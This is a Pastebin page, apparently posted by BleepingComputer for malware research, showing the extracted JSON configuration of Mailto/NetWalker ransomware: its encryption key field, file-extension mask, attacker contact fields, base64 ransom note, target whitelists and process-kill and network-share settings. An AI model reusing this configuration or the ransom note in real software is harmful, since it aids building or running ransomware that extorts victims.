API tools faq
paste
BleepingComputer

Mailto / NetWalker Ransomware Config

BleepingComputer
Feb 5th, 2020
2,387
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.05 KB | None | 0 0
raw download clone embed print report
  1. {
  2. "mpk :"EXgCIpycIJzspm07Loi9L5uOcxC+VZ/NjxWfOn7UqVE=",
  3. "mode :0,
  4. "thr :1500,
  5. "spsz :16384,
  6. "namesz :6,
  7. "idsz :5,
  8. "crmask :".mailto[{mail1}].{id}",
  9. "mail :["[email protected]" ,"[email protected]"],
  10. "lfile :"{ID}-Readme.txt",
  11. "lend :"SGkhDQpZb3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQuDQpBbGwgZW5jcnlwdGVkIGZpbGVzIGZvciB0aGlzIGNvbXB1dGVyIGhhcyBleHRlbnNpb246IC57aWR9DQoNCi0tDQoNCklmIGZvciBzb21lIHJlYXNvbiB5b3UgcmVhZCB0aGlzIHRleHQgYmVmb3JlIHRoZSBlbmNyeXB0aW9uIGVuZGVkLA0KdGhpcyBjYW4gYmUgdW5kZXJzdG9vZCBieSB0aGUgZmFjdCB0aGF0IHRoZSBjb21wdXRlciBzbG93cyBkb3duLCANCmFuZCB5b3VyIGhlYXJ0IHJhdGUgaGFzIGluY3JlYXNlZCBkdWUgdG8gdGhlIGFiaWxpdHkgdG8gdHVybiBpdCBvZmYsDQp0aGVuIHdlIHJlY29tbWVuZCB0aGF0IHlvdSBtb3ZlIGF3YXkgZnJvbSB0aGUgY29tcHV0ZXIgYW5kIGFjY2VwdCB0aGF0IHlvdSBoYXZlIGJlZW4gY29tcHJvbWlzZWQsDQpyZWJvb3Rpbmcvc2h1dGRvd24gd2lsbCBjYXVzZSB5b3UgdG8gbG9zZSBmaWxlcyB3aXRob3V0IHRoZSBwb3NzaWJpbGl0eSBvZiByZWNvdmVyeSBhbmQgZXZlbiBnb2Qgd2lsbCBub3QgYmUgYWJsZSB0byBoZWxwIHlvdSwNCml0IGNvdWxkIGJlIGZpbGVzIG9uIHRoZSBuZXR3b3JrIGJlbG9uZ2luZyB0byBvdGhlciB1c2Vycywgc3VyZSB5b3Ugd2FudCB0byB0YWtlIHRoYXQgcmVzcG9uc2liaWxpdHk/DQoNCi0tDQoNCk91ciBlbmNyeXB0aW9uIGFsZ29yaXRobXMgYXJlIHZlcnkgc3Ryb25nIGFuZCB5b3VyIGZpbGVzIGFyZSB2ZXJ5IHdlbGwgcHJvdGVjdGVkLCB5b3UgY2FuJ3QgaG9wZSB0byByZWNvdmVyIHRoZW0gd2l0aG91dCBvdXIgaGVscC4NClRoZSBvbmx5IHdheSB0byBnZXQgeW91ciBmaWxlcyBiYWNrIGlzIHRvIGNvb3BlcmF0ZSB3aXRoIHVzIGFuZCBnZXQgdGhlIGRlY3J5cHRlciBwcm9ncmFtLg0KRG8gbm90IHRyeSB0byByZWNvdmVyIHlvdXIgZmlsZXMgd2l0aG91dCBhIGRlY3J5cHQgcHJvZ3JhbSwgeW91IG1heSBkYW1hZ2UgdGhlbSBhbmQgdGhlbiB0aGV5IHdpbGwgYmUgaW1wb3NzaWJsZSB0byByZWNvdmVyLg0KDQpXZSBhZHZpc2UgeW91IHRvIGNvbnRhY3QgdXMgYXMgc29vbiBhcyBwb3NzaWJsZSwgb3RoZXJ3aXNlIHRoZXJlIGlzIGEgcG9zc2liaWxpdHkgdGhhdCB5b3VyIGZpbGVzIHdpbGwgbmV2ZXIgYmUgcmV0dXJuZWQuDQpGb3IgdXMgdGhpcyBpcyBqdXN0IGJ1c2luZXNzIGFuZCB0byBwcm92ZSB0byB5b3Ugb3VyIHNlcmlvdXNuZXNzLCB3ZSB3aWxsIGRlY3J5cHQgeW91IHNvbWUgZmlsZXMgZm9yIGZyZWUsIA0KYnV0IHdlIHdpbGwgbm90IHdhaXQgZm9yIHlvdXIgbGV0dGVyIGZvciBhIGxvbmcgdGltZSwgbWFpbCBjYW4gYmUgYWJ1c2VkLCB3ZSBhcmUgbW92aW5nIG9uLCBodXJyeSB1cCB3aXRoIHRoZSBkZWNpc2lvbi4NCg0K0KFvbnRhY3QgdXM6DQoxLnttYWlsMX0NCjIue21haWwyfQ0KDQpEb24ndCBmb3JnZXQgdG8gaW5jbHVkZSB5b3VyIGNvZGUgaW4gdGhlIGVtYWlsOg0Ke2NvZGV9",
  12. "white :{
  13. "path :["*system volume information","*windows.old","*:\users\*\*temp","*msocache","*:\winnt","*$windows.~ws","*perflogs","*boot","*:\windows","*:\program file*","\vmware","\\*\users\*\*temp","\\*\winnt nt","\\*\windows","*\program file*\vmwaree","*appdata*microsoft","*appdata*packages","*microsoft\provisioning","*dvd maker","*Internet Explorer","*Mozilla","*Old Firefox data","*\program file*\windows media*","*\program file*\windows portable*","*windows defender","*\program file*\windows nt","*\program file*\windows photo*","*\program file*\windows side*","*\program file*\windowspowershell","*\program file*\cuas*","*\program file*\microsoft games","*\program file*\common files\system em","*\program file*\common files\*shared","*\program file*\common files\reference ass*","*\windows\cache*","*temporary internet*","*media player", "*:\users\*\appdata\*\microsoft","\\*\users\*\appdata\*\microsoft"],
  14. "file :["ntuser.dat*","iconcache.db","gdipfont*.dat","ntuser.ini","usrclass.dat","usrclass.dat*","boot.ini","bootmgr","bootnxt","desktop.ini","ntuser.dat" ,"autorun.inf","ntldr","thumbs.db","bootsect.bak","bootfont.bin"],
  15. "ext :["msp" ,"exe" ,"sys" ,"msc" ,"mod" ,"clb" ,"mui" ,"regtrans-ms" , "theme" ,"hta" ,"shs" ,"nomedia" ,"diagpkg" ,"cab" ,"ics" ,"msstyles" ,"cur" ,"drv" ,"icns" ,"diagcfg" ,"dll" ,"ocx" ,"lnk" ,"ico" ,"idx" ,"ps1" ,"mpa" ,"cpl" ,"icl" ,"msu" ,"msi" ,"nls" ,"scr" ,"adv" ,"386" ,"com" ,"hlp" ,"rom" ,"lock" ,"386" ,"wpx" ,"ani" ,"prf" ,"rtp" ,"ldf' ,"key" ,"diagcab" ,"cmd" ,"spl" ,"deskthemepack" ,"bat" ,"themepack" ]
  16. }",
  17. kill :{
  18. "use :true,
  19. "task :["reboot ,"restart ,"shutdown ,"logoff ,"back ]
  20. },
  21. "net :{
  22. "use :true,
  23. "ignore : {
  24. "use :true,
  25. "disk :true,
  26. "share :["ipc$ ,"admin$ ]
  27. }
  28. }
  29. "unlocker :{
  30. "use :true,
  31. "ignore : {
  32. "use :true,
  33. "pspath :["*:\windows* ","*:\winnt* ","*:\program file*\vmwar* *"],
  34. "prc :["psexec.exe ,"system ]
  35. }
  36. }
  37. }
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!